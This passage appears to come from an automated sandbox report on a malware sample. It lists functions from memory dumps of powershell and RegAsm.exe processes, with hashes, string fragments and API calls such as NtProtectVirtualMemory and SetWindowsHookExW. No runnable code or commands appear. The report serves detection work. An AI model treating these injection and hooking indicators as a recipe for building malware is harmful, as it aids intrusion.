Opcode Fuzzy Hash: e73d20886a85dbc4e7bf5ca96e233ef09dc1f2b57e53c6031f008aaf605613e4
Instruction Fuzzy Hash: 5A012B711083409EE7104E65DD84F6BBFD8EF41324F08C429ED481F546C679E841CAB2

Function 040AD006 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1752008648.00000000040AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 040AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_40ad000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5dba797c04be7e3656f434f375124cff8defbc01caa9daf73e10b0b2cc8797c
Instruction ID: 2adaa10facd188b59630715c469aa5e597de78a56afbb5a4c4d430e2d3170fb9
Opcode Fuzzy Hash: f5dba797c04be7e3656f434f375124cff8defbc01caa9daf73e10b0b2cc8797c
Instruction Fuzzy Hash: C5015E6100E3C09ED7128B259C94B66BFB4EF53224F1DC0CBD8889F1A3C2699849DB72

Non-executed Functions

Function 06EE2130 Relevance: 9.2, Strings: 7, Instructions: 497COMMON

Download Yara Rule

Strings

4'^q, xrefs: 06EE25D7
$^q, xrefs: 06EE25A4
$^q, xrefs: 06EE254E
4'^q, xrefs: 06EE2234
$^q, xrefs: 06EE25B0
4'^q, xrefs: 06EE25CB
4'^q, xrefs: 06EE2228

Memory Dump Source

Source File: 00000006.00000002.1787373118.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ee0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$4'^q$4'^q$$^q$$^q$$^q
API String ID: 0-3199432138
Opcode ID: 5577af565d2b4edc3461b567a1a8b6611749bf88609e7cc8fe396e697948da71
Instruction ID: 88c848e43519078402fbe2caa762616c80c31fee1357deb90870776940b18518
Opcode Fuzzy Hash: 5577af565d2b4edc3461b567a1a8b6611749bf88609e7cc8fe396e697948da71
Instruction Fuzzy Hash: CEF15731B103058FDB649F7998107AABBEAAFC5214F24807BD605CB355DF36CA85C7A2

Function 06EE0308 Relevance: 5.0, Strings: 4, Instructions: 48COMMON

Download Yara Rule

Strings

$^q, xrefs: 06EE035E
4'^q, xrefs: 06EE037F
4'^q, xrefs: 06EE0373
$^q, xrefs: 06EE0352

Memory Dump Source

Source File: 00000006.00000002.1787373118.0000000006EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6ee0000_powershell.jbxd

Similarity

API ID:
String ID: 4'^q$4'^q$$^q$$^q
API String ID: 0-2049395529
Opcode ID: 014b3d5bf25c17d9b8621f177a11832d086100f36ddfa26f36dc9b67fbf104af
Instruction ID: 385e5e0a59f0de53e1d660dd2f632632bdd2760448ee39a1fe6e4d9079121759
Opcode Fuzzy Hash: 014b3d5bf25c17d9b8621f177a11832d086100f36ddfa26f36dc9b67fbf104af
Instruction Fuzzy Hash: 6E01F210B0D3C54FC72B16282C289266FB65FC291072A04DBD082CF3A7CDA94D59C3B3

Analysis Process: RegAsm.exePID: 7940, Parent PID: 7728COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	33.3%
Total number of Nodes:	9
Total number of Limit Nodes:	0

Executed Functions

Function 02BB2F19 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 459
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BB33F9

Strings

4|cq, xrefs: 02BB331D
s8m, xrefs: 02BB3392

Memory Dump Source

Source File: 0000000B.00000002.4118255163.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2bb0000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: 4|cq$s8m
API String ID: 2706961497-2862506100
Opcode ID: 646c00cfcd0106e2e697b797cb7f5226333b2ae505d5f533ae045fcc3db27d15
Instruction ID: 6c0b0d3c3e3e0db45f9caa5e863cecc107667afe446da50a63b97f64b0ad9077
Opcode Fuzzy Hash: 646c00cfcd0106e2e697b797cb7f5226333b2ae505d5f533ae045fcc3db27d15
Instruction Fuzzy Hash: 1AE1C131F042455BDB15CABD8D903FE76E3AFC8224F9882B9D956DB380EBB4D8468741

Function 02BB3370 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 02BB33F9

Strings

s8m, xrefs: 02BB3392

Memory Dump Source

Source File: 0000000B.00000002.4118255163.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2bb0000_RegAsm.jbxd

Similarity

API ID: MemoryProtectVirtual
String ID: s8m
API String ID: 2706961497-989535315
Opcode ID: 98b12ceb9252afc7d9bfda470a03ca5899b759fcaf7dbbbed6d57ac2d2b17bcb
Instruction ID: fdb15f5434f2bf56ef709ae241ba17aa18a9ab3d3e276975ba7ec9c5e99b391b
Opcode Fuzzy Hash: 98b12ceb9252afc7d9bfda470a03ca5899b759fcaf7dbbbed6d57ac2d2b17bcb
Instruction Fuzzy Hash: 482114B1D003499FCB10CFAAD984ADEFBF4FF48314F20842AE559A7210C775A944CBA5

Function 02BB90D0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BB915F

Strings

s8m, xrefs: 02BB90F7

Memory Dump Source

Source File: 0000000B.00000002.4118255163.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2bb0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID: s8m
API String ID: 3793708945-989535315
Opcode ID: a5ffca527cb193ebe398b2303f4618c30ce3cc8fb3e45a6d806bdad89a1ff35e
Instruction ID: 87faec3c516f3017516afa225e1d83044dc4dd14e2272686b6ceddd6c6f6dade
Opcode Fuzzy Hash: a5ffca527cb193ebe398b2303f4618c30ce3cc8fb3e45a6d806bdad89a1ff35e
Instruction Fuzzy Hash: 3021E6B5D00348AFDB10CF99D984AEEBBF5EF48314F14845AE954A3310D374A944DFA5

Function 02BB90D8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 02BB915F

Strings

s8m, xrefs: 02BB90F7

Memory Dump Source

Source File: 0000000B.00000002.4118255163.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2bb0000_RegAsm.jbxd

Similarity

API ID: DuplicateHandle
String ID: s8m
API String ID: 3793708945-989535315
Opcode ID: 1cea44dc2a800cd0bb0a8523102d2826d0cbd4f72a10f27ec3c2ab8492b3645d
Instruction ID: 7ff757729ad1413831ba2d2110f81776f0bc14aba310cfc80c0812eb16bf4d6a
Opcode Fuzzy Hash: 1cea44dc2a800cd0bb0a8523102d2826d0cbd4f72a10f27ec3c2ab8492b3645d
Instruction Fuzzy Hash: 2821E4B5D00248AFDB10CFAAD984ADEBBF4EB48324F14845AE958A3310D374A944CFA5

Function 02BB3D78 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02BB3DFB

Strings

s8m, xrefs: 02BB3D9A

Memory Dump Source

Source File: 0000000B.00000002.4118255163.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2bb0000_RegAsm.jbxd

Similarity

API ID: HookWindows
String ID: s8m
API String ID: 2559412058-989535315
Opcode ID: 77928a35a5a9fd1e8188661853ce267d15002c03d03acba02f7f292d852625c7
Instruction ID: 09f7ac66dc881fcfd55d4541c3f2e354bbdb2c452de01f5d4c0c1f7c86c5bae9
Opcode Fuzzy Hash: 77928a35a5a9fd1e8188661853ce267d15002c03d03acba02f7f292d852625c7
Instruction Fuzzy Hash: 0D2149B1D002099FCB14CF99C945BEEFBF4EF88324F14846AE458A7250CBB4A944CFA5

Function 02BB3D80 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetWindowsHookExW.USER32(?,00000000,?,?), ref: 02BB3DFB

Strings

s8m, xrefs: 02BB3D9A

Memory Dump Source

Source File: 0000000B.00000002.4118255163.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_2bb0000_RegAsm.jbxd

Similarity

API ID: HookWindows
String ID: s8m
API String ID: 2559412058-989535315
Opcode ID: c1a7fbbd0e0545c91a2798ba83f2ad06dce8b32cd0ee7e5643b8c896d8bafe25
Instruction ID: 1b1578e88e7c04c1008745ec3918e534380b646e34cbbd65ca63df0ad58cfe60
Opcode Fuzzy Hash: c1a7fbbd0e0545c91a2798ba83f2ad06dce8b32cd0ee7e5643b8c896d8bafe25
Instruction Fuzzy Hash: 492127B5D002499FCB14CF99C944BEEFBF4EF88324F10846AE459A7250C7B4A944CFA5

Function 06992880 Relevance: 3.0, Strings: 2, Instructions: 466
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 06992D40
(bq, xrefs: 06992BF8

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: d208802ad15cdb89546025ea91241ca0119c09ea6850c64a75d0a6ce0ece890a
Instruction ID: cc93c64cd313133f532d15252a1dc98359838560a3da1dbe46241812182d812c
Opcode Fuzzy Hash: d208802ad15cdb89546025ea91241ca0119c09ea6850c64a75d0a6ce0ece890a
Instruction Fuzzy Hash: F5F1E435B042049FCB54DF69D854A6EBBBAFF89310F14856AE906CB351CB31ED06CBA0

Function 069948C8 Relevance: 2.8, Strings: 2, Instructions: 314
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06994909
(bq, xrefs: 06994C18

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: (bq$$^q
API String ID: 0-3826094709
Opcode ID: 1ca6ce813fa5e719ee275d69e1cf48e82510957a82d12f2f7705f2956679a546
Instruction ID: 0a59e6ac8a761b96b4640f51719dbd24cd4159cc77a481fe00d28997dde906bc
Opcode Fuzzy Hash: 1ca6ce813fa5e719ee275d69e1cf48e82510957a82d12f2f7705f2956679a546
Instruction Fuzzy Hash: E5B15B70F002099FDB08DB6DC95466EBBEAEFC8710F248569E809DB354DE31DC468BA1

Function 06992178 Relevance: 2.7, Strings: 2, Instructions: 227
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(bq, xrefs: 069923D0
(bq, xrefs: 069923FC

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: (bq$(bq
API String ID: 0-4224401849
Opcode ID: 526485c2e27fdf08e1be782c4957089cf9156d19012c65d43d857a2fa6b08bed
Instruction ID: ad9b4e2743ad73283a51bb03e8236187da2d397bbe4d087fd290590c65b4a151
Opcode Fuzzy Hash: 526485c2e27fdf08e1be782c4957089cf9156d19012c65d43d857a2fa6b08bed
Instruction Fuzzy Hash: BB81DF35B102059FDF48DF69D4546AEB7B6FB88300F14852AE902E7784CB35ED52CBA0

Function 06992ED8 Relevance: 2.7, Strings: 2, Instructions: 185
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4'^q, xrefs: 06993044
,bq, xrefs: 06992EF0

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: ,bq$4'^q
API String ID: 0-1386295989
Opcode ID: 02d7e75598348a3a95ee8e2850ce2121a36c97b734a5ae33982e7d3655f380d5
Instruction ID: 965263ecc95a20716e02698f68aadd9250aa5171146796524f16d185dc6c6768
Opcode Fuzzy Hash: 02d7e75598348a3a95ee8e2850ce2121a36c97b734a5ae33982e7d3655f380d5
Instruction Fuzzy Hash: 41519F31B001159FCB44DF6DC9509AEBBFBAFC8250B14806AE506EB359DE31DD028BA1

Function 06995FF0 Relevance: 2.6, Strings: 2, Instructions: 111COMMON

Download Yara Rule

Strings

$^q, xrefs: 06996025
$^q, xrefs: 0699602F

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 061fbb441dc43f15c7a896c1d7ded4eb74cb9d5b18613859908812c4b9afdb63
Instruction ID: 8e897ec70b4a29438d20b751500d56e4e2d6cc78e7a60dd3224f9aa059ed0755
Opcode Fuzzy Hash: 061fbb441dc43f15c7a896c1d7ded4eb74cb9d5b18613859908812c4b9afdb63
Instruction Fuzzy Hash: 28417A34A04404CFEB985F5ED64842ABBB7FF85B157388849E0068BA55CF32DD16CBE2

Function 06997287 Relevance: 2.6, Strings: 2, Instructions: 55COMMON

Download Yara Rule

Strings

Te^q, xrefs: 069972B5
n, xrefs: 0699728C

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q$n
API String ID: 0-1376568432
Opcode ID: 0782afb952592895f2f6c55c79eaff264a145b462f8c6c7a599131b9813ab0ec
Instruction ID: f253c8885211abcc26dc60a5a939e4c74feda630f966be2b7d1f34cbf2c9d755
Opcode Fuzzy Hash: 0782afb952592895f2f6c55c79eaff264a145b462f8c6c7a599131b9813ab0ec
Instruction Fuzzy Hash: 01110234B101009FCB089B68CA09BAE7BF2AF88700F210059E502EB3A5CF708C05CB90

Function 06996B18 Relevance: 1.5, Strings: 1, Instructions: 213COMMON

Download Yara Rule

Strings

xbq, xrefs: 06996E5E

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: xbq
API String ID: 0-73991425
Opcode ID: 627c668b60ea2ee5cabdcadb0476a085a4cfcbaa853683b7ed8939b80af98dbc
Instruction ID: 7dac789de0fead068ad0606dc8f5bef8a1bff8ecd4523cb9013ef7e1cd4f0335
Opcode Fuzzy Hash: 627c668b60ea2ee5cabdcadb0476a085a4cfcbaa853683b7ed8939b80af98dbc
Instruction Fuzzy Hash: 73918C71D453018FEBA4CF2DE848B6877B2BB88354FB4491AD581AB790D770B8A4CF91

Function 069967F0 Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

Te^q, xrefs: 0699688E

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: b921baf345329b277101950e83815ba49131529dfa84b8294e70a0de73c48a55
Instruction ID: 196639fecc06254e233f3509e260ec344eb5a20f6d1302d7f11a37196e2c804c
Opcode Fuzzy Hash: b921baf345329b277101950e83815ba49131529dfa84b8294e70a0de73c48a55
Instruction Fuzzy Hash: 6A51CE35A40205DFEB14DF69D958B69BBF6BF88710F204169E501AB3A4CB71AC40CFA0

Function 06995FD9 Relevance: 1.4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

Strings

$^q, xrefs: 06996025

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: d71886c8b59b049a2cf5b06b4cd0745357215705a727caa091ad722645a87f3f
Instruction ID: 505e58ff6443053d9a6c4b4065c76118b7b6b4dafdcb90ba8cdc3d84f73626e3
Opcode Fuzzy Hash: d71886c8b59b049a2cf5b06b4cd0745357215705a727caa091ad722645a87f3f
Instruction Fuzzy Hash: AD41A074A08544CFEB595F5E9648029BF73BF857157388889E0068BA52CB329D17CBE2

Function 06995C28 Relevance: 1.4, Strings: 1, Instructions: 108COMMON

Download Yara Rule

Strings

s8m, xrefs: 06995C4A

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: s8m
API String ID: 0-989535315
Opcode ID: 4ab98fd52ff97d3307070ed757da8a840fa751d54ce94a0db0f6f43cda2e8dee
Instruction ID: 68eaed8e082edfe59c256b9e6ee55e4a0d1eefc651b886ad72215348d06ec58c
Opcode Fuzzy Hash: 4ab98fd52ff97d3307070ed757da8a840fa751d54ce94a0db0f6f43cda2e8dee
Instruction Fuzzy Hash: E44102B1D012489FDF15CFA9D954ADEBBF5EF48300F24802AE409AB254DB70A945CFA0

Function 06995C1C Relevance: 1.3, Strings: 1, Instructions: 95COMMON

Download Yara Rule

Strings

s8m, xrefs: 06995C4A

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: s8m
API String ID: 0-989535315
Opcode ID: cdd3fc95a8fd669f17321a6f5e653630251a42e81cae1a6168331e9092f1c841
Instruction ID: ea8d9d1b9c3fbfcd17a40d3acf2513cc18ed70cffd503090e90229452472b879
Opcode Fuzzy Hash: cdd3fc95a8fd669f17321a6f5e653630251a42e81cae1a6168331e9092f1c841
Instruction Fuzzy Hash: 3F41F0B1D01248DFDF15CFA9C998BDEBBF6AF48304F24802AE409AB254DB709945CF60

Function 06997335 Relevance: 1.3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06997363

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 94e3a07e2d9e6b347c68c2027e379c71d49ca521fd0d4adef8d6342680d8dc0c
Instruction ID: 736c8f685dbb869f5be09decd74e50aa03d02d2a4f42dc25c889b8ec8b4237c5
Opcode Fuzzy Hash: 94e3a07e2d9e6b347c68c2027e379c71d49ca521fd0d4adef8d6342680d8dc0c
Instruction Fuzzy Hash: 8231D470F501058FDB189FA9D558BAEBEE7AF88700F244459E502EB3A5CEB48D01CBA1

Function 069966D8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06996703

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 89a2158bdb6573c4db423b53a6fdae0a248b33e4e066d93a6310e3bba361ab5f
Instruction ID: a9e2d3886b0fa73e7cd9a3cfa7b8a0973a759be76865404e496857e6e0ec2bc8
Opcode Fuzzy Hash: 89a2158bdb6573c4db423b53a6fdae0a248b33e4e066d93a6310e3bba361ab5f
Instruction Fuzzy Hash: 2911AF30B502009FEB54DB29C999FAEBBE6AF88714F15405AE501AB3A5CE749D00CBA0

Function 06995EF8 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06995F22

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: 38a1f53f0bd880f2415bf38b5f09d63eae7208670cc8598d0132df62ec04d757
Instruction ID: 898a74675bf93f8f44705997a34dba57da1c95ee1844327b4cfc12a06f072447
Opcode Fuzzy Hash: 38a1f53f0bd880f2415bf38b5f09d63eae7208670cc8598d0132df62ec04d757
Instruction Fuzzy Hash: B4215B35B101108FDB45DB68C558BAA7BF6AF88A24F254099E106EB7A1CF708D05CBA0

Function 06995F08 Relevance: 1.3, Strings: 1, Instructions: 67COMMON

Download Yara Rule

Strings

Te^q, xrefs: 06995F22

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: Te^q
API String ID: 0-671973202
Opcode ID: c33c5ce9b9a93a2005661120bd4ac2b74bebac4faa9c16ea89944db781277ddf
Instruction ID: 5e01f68b9073c01b7f9685992260e01bcc3ba7fa89355974e61ae2108f8ac9aa
Opcode Fuzzy Hash: c33c5ce9b9a93a2005661120bd4ac2b74bebac4faa9c16ea89944db781277ddf
Instruction Fuzzy Hash: D6218E31B101148FDB44DB6CD558B6E7BF6AF88B24F254159E106DB3A1CF709C04CBA1

Function 06994810 Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

$^q, xrefs: 0699483C

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: ac9a292ad100a6e5146d4e287b24e8d9ddb0eb116fa7863c77e63923ca33b2d9
Instruction ID: 95260aa26116b5298e96eaf98ce2d897ead7f0e25b2a925d9b015d719c612167
Opcode Fuzzy Hash: ac9a292ad100a6e5146d4e287b24e8d9ddb0eb116fa7863c77e63923ca33b2d9
Instruction Fuzzy Hash: C5118C32B001445FCB59DE6ED410A6A77DEAFC4B50724803AE505CB274DA65DC42C7A0

Function 06992EC8 Relevance: 1.3, Strings: 1, Instructions: 51COMMON

Download Yara Rule

Strings

,bq, xrefs: 06992EF0

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: ,bq
API String ID: 0-2474004448
Opcode ID: 2843b590c3add09b3f2a7c920f692e059def076ba34535ce666d4982b3201dc2
Instruction ID: b71305b414c365cd61d51d8718d06ed7a38702a2b264b04b35fa898a6f9f8d80
Opcode Fuzzy Hash: 2843b590c3add09b3f2a7c920f692e059def076ba34535ce666d4982b3201dc2
Instruction Fuzzy Hash: 5001A235B111046B8B54EB6D9D4089BBBEAAFCA2547148126E909D735ADE30DE0147F1

Function 06994801 Relevance: 1.3, Strings: 1, Instructions: 45COMMON

Download Yara Rule

Strings

$^q, xrefs: 0699483C

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID: $^q
API String ID: 0-388095546
Opcode ID: 2bedbfb24cd094cacd77483730c32fd17073a3f9e52b98829f654fa15221c7c0
Instruction ID: 0bc5a0be37c0e75710901547f2b29ff731afcf997b2c53fefac4f4610653ab98
Opcode Fuzzy Hash: 2bedbfb24cd094cacd77483730c32fd17073a3f9e52b98829f654fa15221c7c0
Instruction Fuzzy Hash: 6101D631B042952FD72A9E3E8820A6B3ADEAFC5A40714416AF501DB275DE68DC5283F0

Function 06996ED0 Relevance: .2, Instructions: 248COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5584e73c194744c9c26d1f3c743038caf56deb55422d68caf1e79abc44463c97
Instruction ID: 6e99f073646c722f3342b41d61e4d855bb2cd9f513347527701d0c1aee5966b6
Opcode Fuzzy Hash: 5584e73c194744c9c26d1f3c743038caf56deb55422d68caf1e79abc44463c97
Instruction Fuzzy Hash: 9A91BD30B202018FCF49EF78E55466DBBA7AFC9204B20856AD806DB395DF71EC478B91

Function 06994620 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7605cac5c6e7677e5dd2250cdedf00ebee24a19c8cc6f9c229d043793afdfd9d
Instruction ID: 047a459e1ceeeb0e241b768a3e2798df99cdefd3dd65558602c2eab0bcca0e0f
Opcode Fuzzy Hash: 7605cac5c6e7677e5dd2250cdedf00ebee24a19c8cc6f9c229d043793afdfd9d
Instruction Fuzzy Hash: F4510230A0060A9FCB51CF5CC9C0A6ABBFAFF85714F10C269D5158B691D730E956CFA0

Function 06998448 Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4df832ab6c73cc10f3f74660d4d2f2fbc3e541b0ca847dd0ac1e61c30a08bde3
Instruction ID: b72f8c7e4ca0140abe13e913fa667926360d78009fa732c4a8b41dd5e7075545
Opcode Fuzzy Hash: 4df832ab6c73cc10f3f74660d4d2f2fbc3e541b0ca847dd0ac1e61c30a08bde3
Instruction Fuzzy Hash: E9414C35A002189FDF54CB9DD944AEDB7B9EF89320F1484AAE905E7660DB30DC46CB62

Function 069961B0 Relevance: .1, Instructions: 102COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18768b12870a8f83c69da9c585d9df2bd125fb671c70cf70426faf821f4c59e0
Instruction ID: 703c3f1b5861eaa056c2c5ae7fe64c7f63ed7e2d8060dec5d77fb6a9cbb56c2d
Opcode Fuzzy Hash: 18768b12870a8f83c69da9c585d9df2bd125fb671c70cf70426faf821f4c59e0
Instruction Fuzzy Hash: 6D416F74A00105CFDB54DF68C984E6EBBB2FF85314F1584A5E855ABBA2CB31EC41CBA0

Function 06996ECE Relevance: .1, Instructions: 73COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.4137012936.0000000006990000.00000040.00000800.00020000.00000000.sdmp, Offset: 06990000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_6990000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae11423ec259f33517ceea8d39d5832d8a52f7e3874d9ed5ebd3ae19bd11267c
Instruction ID: d3f552797516a826264dd6cd30e0930974d2a58c3198f91202df601711f2ffd0
Opcode Fuzzy Hash: ae11423ec259f33517ceea8d39d5832d8a52f7e3874d9ed5ebd3ae19bd11267c
